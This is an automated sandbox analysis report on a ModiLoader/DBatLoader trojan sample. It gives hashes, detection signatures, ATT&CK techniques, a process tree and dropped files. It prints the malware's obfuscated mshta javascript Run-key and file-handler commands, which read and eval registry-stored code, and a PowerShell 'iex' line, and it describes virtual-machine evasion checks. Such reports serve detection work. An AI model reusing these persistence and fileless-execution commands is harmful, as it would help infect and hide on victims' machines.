modiloader | 3d011a40ee4351a1d5c6724c56a553804c7ab5eb38c39908253e16d423edb59a

Analysis

max time kernel
150s
max time network
155s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04-10-2024 16:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe
Size

577KB
MD5

142341637783fa53c6be6c11e7a3a969
SHA1

33d77c771134cffd4d3c3791aea0a9f6e73b2e54
SHA256

3d011a40ee4351a1d5c6724c56a553804c7ab5eb38c39908253e16d423edb59a
SHA512

2de355f71bbba9ba313b1974afaeb1994bbbe1992e1b6b99282e19e75074fbaf8b018119e4e8e88ebf3502816523aa2f436578d6dc4a9a516d97d9280d82ecce
SSDEEP

12288:LeohY7kszv6ynzRtxvlX3UHZEylVVGYMvtTvxkgoT:LYTvnbcmyLV34rPq

Score

10^/10

modiloader discovery evasion execution persistence trojan upx

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1692	2080	mshta.exe	31

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions	regsvr32.exe

Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys	regsvr32.exe

ModiLoader Second Stage 43 IoCs

resource	yara_rule
behavioral1/memory/2536-10-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-37-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-14-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-7-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-5-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-6-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-53-0x00000000002F0000-0x00000000003C4000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-56-0x00000000002F0000-0x00000000003C4000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-55-0x00000000002F0000-0x00000000003C4000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-58-0x00000000002F0000-0x00000000003C4000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-54-0x00000000002F0000-0x00000000003C4000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-60-0x00000000002F0000-0x00000000003C4000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-61-0x00000000002F0000-0x00000000003C4000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-66-0x00000000002F0000-0x00000000003C4000-memory.dmp	modiloader_stage2
behavioral1/memory/2320-73-0x0000000005C50000-0x0000000005D24000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-75-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-74-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/2320-77-0x0000000005C50000-0x0000000005D24000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-83-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-92-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-91-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-90-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-89-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-88-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-87-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-86-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-85-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-84-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-82-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-81-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-80-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-79-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-78-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/2320-76-0x0000000002710000-0x0000000004710000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-100-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-99-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-98-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-97-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-96-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-95-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-94-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/1328-93-0x0000000000240000-0x000000000037E000-memory.dmp	modiloader_stage2
behavioral1/memory/2536-150-0x00000000002F0000-0x00000000003C4000-memory.dmp	modiloader_stage2

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools	regsvr32.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x00050000000186c2-30.dat	acprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	regsvr32.exe

Deletes itself 1 IoCs

pid	Process
1328	regsvr32.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ed5072.lnk	regsvr32.exe

Loads dropped DLL 1 IoCs

pid	Process
2536	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:Y8JWWlgjy=\"ID\";Ai7=new%20ActiveXObject(\"WScript.Shell\");rUQau5ypu=\"83t0PB6pQ\";g1Q8Jg=Ai7.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\iuvjdch\\\\azua\");q4Jn5Nvc=\"78u\";eval(g1Q8Jg);s12qfwlo=\"2pL\";"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:ZXsSAEEk0=\"xHO\";Jb30=new%20ActiveXObject(\"WScript.Shell\");nMYtGy97D=\"keh\";m7oqx=Jb30.RegRead(\"HKCU\\\\software\\\\iuvjdch\\\\azua\");r5BQLcIi6p=\"d6z\";eval(m7oqx);JiulYE84X=\"P9g\";"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\3d1107\\facfe4.lnk\""	regsvr32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2320	powershell.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	regsvr32.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2772 set thread context of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 2320 set thread context of 1328	2320	powershell.exe	35
PID 1328 set thread context of 1836	1328	regsvr32.exe	36

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00050000000186c2-30.dat	upx
behavioral1/memory/2536-52-0x0000000074090000-0x00000000740BE000-memory.dmp	upx
behavioral1/memory/2536-64-0x0000000074090000-0x00000000740BE000-memory.dmp	upx
behavioral1/memory/2536-68-0x0000000074090000-0x00000000740BE000-memory.dmp	upx
behavioral1/memory/2536-149-0x0000000074090000-0x00000000740BE000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\International	regsvr32.exe

Modifies registry class 7 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\243aec\shell\open\command\ = "mshta \"javascript:Ev7jEsqbC=\"0LXV4qq\";MI6=new ActiveXObject(\"WScript.Shell\");VNt5znZ1=\"0\";MxBV5=MI6.RegRead(\"HKCU\\\\software\\\\iuvjdch\\\\azua\");sDt1AxM=\"xaJC\";eval(MxBV5);YfkE01BAwx=\"g\";\""	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\.675646c	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\.675646c\ = "243aec"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\243aec	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\243aec\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\243aec\shell\open	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\243aec\shell\open\command	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe
2320	powershell.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe
1328	regsvr32.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2320	powershell.exe
1328	regsvr32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe
Token: SeDebugPrivilege	2320	powershell.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 2772 wrote to memory of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 2772 wrote to memory of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 2772 wrote to memory of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 2772 wrote to memory of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 2772 wrote to memory of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 2772 wrote to memory of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 2772 wrote to memory of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 2772 wrote to memory of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 2772 wrote to memory of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 2772 wrote to memory of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 2772 wrote to memory of 2336	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	27
PID 2772 wrote to memory of 256	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	1
PID 2772 wrote to memory of 1188	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	19
PID 2772 wrote to memory of 336	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	2
PID 2772 wrote to memory of 588	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	9
PID 2772 wrote to memory of 408	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	5
PID 2772 wrote to memory of 1292	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	20
PID 2772 wrote to memory of 668	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	10
PID 2772 wrote to memory of 2536	2772	142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe	30
PID 1692 wrote to memory of 2320	1692	mshta.exe	33
PID 1692 wrote to memory of 2320	1692	mshta.exe	33
PID 1692 wrote to memory of 2320	1692	mshta.exe	33
PID 1692 wrote to memory of 2320	1692	mshta.exe	33
PID 2320 wrote to memory of 1328	2320	powershell.exe	35
PID 2320 wrote to memory of 1328	2320	powershell.exe	35
PID 2320 wrote to memory of 1328	2320	powershell.exe	35
PID 2320 wrote to memory of 1328	2320	powershell.exe	35
PID 2320 wrote to memory of 1328	2320	powershell.exe	35
PID 2320 wrote to memory of 1328	2320	powershell.exe	35
PID 2320 wrote to memory of 1328	2320	powershell.exe	35
PID 2320 wrote to memory of 1328	2320	powershell.exe	35
PID 1328 wrote to memory of 1836	1328	regsvr32.exe	36
PID 1328 wrote to memory of 1836	1328	regsvr32.exe	36
PID 1328 wrote to memory of 1836	1328	regsvr32.exe	36
PID 1328 wrote to memory of 1836	1328	regsvr32.exe	36
PID 1328 wrote to memory of 1836	1328	regsvr32.exe	36
PID 1328 wrote to memory of 1836	1328	regsvr32.exe	36
PID 1328 wrote to memory of 1836	1328	regsvr32.exe	36
PID 1328 wrote to memory of 1836	1328	regsvr32.exe	36

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe
1⤵
PID:256

C:\Windows\system32\csrss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
1⤵
PID:336

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
PID:588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
1⤵
PID:668

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
PID:1188

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1292

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
1⤵
PID:2336

C:\Users\Admin\AppData\Local\Temp\142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2772
- C:\Users\Admin\AppData\Local\Temp\142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\142341637783fa53c6be6c11e7a3a969_JaffaCakes118.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2536

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" javascript:iL8zhbY="S8KnFITT2c";fv08=new%20ActiveXObject("WScript.Shell");NS0KPu3tE="NYSUOJmN";Co94AG=fv08.RegRead("HKLM\\software\\Wow6432Node\\PHuU1uT0xb\\wcpdPXj");dQ1RRRQ1="bwo";eval(Co94AG);STqxE2M="dE1G1AV";
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1692
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:nucy
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2320
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32.exe
    3⤵
    - Looks for VirtualBox Guest Additions in registry
    - Looks for VirtualBox drivers on disk
    - Looks for VMWare Tools registry key
    - Checks BIOS information in registry
    - Deletes itself
    - Drops startup file
    - Adds Run key to start application
    - Maps connected drives based on registry
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:1328
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\SysWOW64\regsvr32.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

File and Directory Discovery

T1083

Peripheral Device Discovery

T1120

Query Registry

T1012

Software Discovery

T1518

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\3d1107\1e9465.675646c

Filesize
6KB

MD5
40641531e7f271ab73215ef12dc9aa1d

SHA1
2e8a8787014a54094d144897a54495bf31382bdb

SHA256
11f2249bfabede11b9120838fc17f931223259cefda20dd6a5c62d627fc771f4

SHA512
048511f25a83fb5458fb0dcc19fc5afd3d02894329a89e6bfe1c0fa671f4caf835ecb28452173f900ab01dcc95dc7444eb1906235d5417f12eb904528117deb8

Download Submit
C:\Users\Admin\AppData\Local\3d1107\497eca.bat

Filesize
61B

MD5
20320415e009645e0dcfded4c89db6b9

SHA1
dbb8129e3372a017a3a2127c635c60adc55d4c7e

SHA256
645398440d7d9e6edabf36abea5e3b6516d2c44fd3142e3d891688c9667a68ce

SHA512
56d09838921ca1fc8ee4fabff38b4ff86549a24451c73ad39759c8cd26f4eedec313a902625a53cee4e35240fc36ab33a159c87e1d75ad712ad301f6840be4db

Download Submit
C:\Users\Admin\AppData\Local\3d1107\facfe4.lnk

Filesize
877B

MD5
a39659d0e9e3fc8407d23fe5fc00651e

SHA1
56d5f90552397fe5246937d24455694b9fb40777

SHA256
850326fc218c7dde24f10dc487f2cf0e676a9ac46303ad8c065635a8aaffa6b5

SHA512
6c856143cbaf7f3a65b320fa978fb1e59315cfcda1cf1d7a4fad0bdc09cf4c8563ab85fd72f5774c73958ef2456e485d9742a6ec4a9d2ec2b36ac3a7ad425893

Download Submit
C:\Users\Admin\AppData\Local\Temp\432fggqdd.txt

Filesize
4B

MD5
f7ac67a9aa8d255282de7d11391e1b69

SHA1
40b3c4d64de2be7dc65e8772aac42d8509cda4b7

SHA256
e1b9005b2bd9380bf2ad43494b6a0c3de7db20532a7297fde352214e9610e4b7

SHA512
09ed6875116a0852b410396c2102fd0ac3412ed3cbac49901604efb86acfedd5c12fb787d9cba6c9dea7f054c54e1f67db9d219af26641de7a159f83c549e0ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\4fggqdd.txt

Filesize
84B

MD5
2f42cfdc40692d2688c78508b16b216f

SHA1
2917b9f20a937ac8027c0bf860a34896ef95032e

SHA256
513eec8db182ab73e10d907ff8315cc40870c9c056de58fb0e390ccbcdb32454

SHA512
31e6e139dc0a54426a6b245dc6037c11168b3ef7e7230aaac819c41d69c50d163a0b52fec7e7ba8c17d16ecb91f72ba2cef839382ce5339d9b339a8fa704e174

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4129.tmp

Filesize
66KB

MD5
aaa698721f488b181bc0f0afc5da126a

SHA1
76536a73f16ffd643ea24f8725cebfff9d49852f

SHA256
e71ba7ce01d10e60a4feac7fc5e04f34756ba621c7d88583d0f96bd3b2655647

SHA512
67d8b05678fbdc1678515c341fa8c1e26f3d1b15f2cc390bb9b1a26589a346fd57697dd3366e72d46ab265570929f1be89b8aec81112a2a98194c5886c89261d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ed5072.lnk

Filesize
987B

MD5
d17310539d47eff81e7fb5d36481af42

SHA1
9abf2f0d62ab1542aa6517d42b509301dd7f3938

SHA256
b7485a15da3c255179abb055006a091d575df58010dd20e425dc228db193f6ff

SHA512
96fd6a92522ec2170ce456fdcc37415b76dd2e1664b50b028d3d5bc7c1632af05b10451cfff57b02d2295bed1395c2df57dde70a904dae4530f697d0bdc7e96e

Download Submit
C:\Users\Admin\AppData\Roaming\a41be5\df03b2.675646c

Filesize
28KB

MD5
ec45eb646b0d41f7b5f6556e024e76fa

SHA1
603d3819bc73e39ff45fbe55f9a1e53ab1f65abb

SHA256
e4ea14e09c73c340a0a1a6b163e1e71ae4530ff2e07544989eab467ecfd3e907

SHA512
932092d7e423715d531e8e2acd85c5742b23ef4ab6bbdeb1b93a46c802318e52c3bd6abbfa3aad69c8375c1b368e7502dd575e3ba9eb38b4cedb6ce363831baf

Download Submit
memory/1328-100-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-91-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-93-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-94-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-95-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-96-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-97-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-98-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-99-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-78-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-79-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-80-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-81-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-82-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-84-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-85-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-86-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-87-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-88-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-89-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-75-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-74-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-90-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-83-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/1328-92-0x0000000000240000-0x000000000037E000-memory.dmp

Filesize
1.2MB

Download
memory/2320-76-0x0000000002710000-0x0000000004710000-memory.dmp

Filesize
32.0MB

Download
memory/2320-73-0x0000000005C50000-0x0000000005D24000-memory.dmp

Filesize
848KB

Download
memory/2320-77-0x0000000005C50000-0x0000000005D24000-memory.dmp

Filesize
848KB

Download
memory/2336-16-0x0000000000100000-0x0000000000101000-memory.dmp

Filesize
4KB

Download
memory/2536-5-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2536-14-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2536-61-0x00000000002F0000-0x00000000003C4000-memory.dmp

Filesize
848KB

Download
memory/2536-60-0x00000000002F0000-0x00000000003C4000-memory.dmp

Filesize
848KB

Download
memory/2536-54-0x00000000002F0000-0x00000000003C4000-memory.dmp

Filesize
848KB

Download
memory/2536-58-0x00000000002F0000-0x00000000003C4000-memory.dmp

Filesize
848KB

Download
memory/2536-3-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2536-55-0x00000000002F0000-0x00000000003C4000-memory.dmp

Filesize
848KB

Download
memory/2536-56-0x00000000002F0000-0x00000000003C4000-memory.dmp

Filesize
848KB

Download
memory/2536-66-0x00000000002F0000-0x00000000003C4000-memory.dmp

Filesize
848KB

Download
memory/2536-7-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
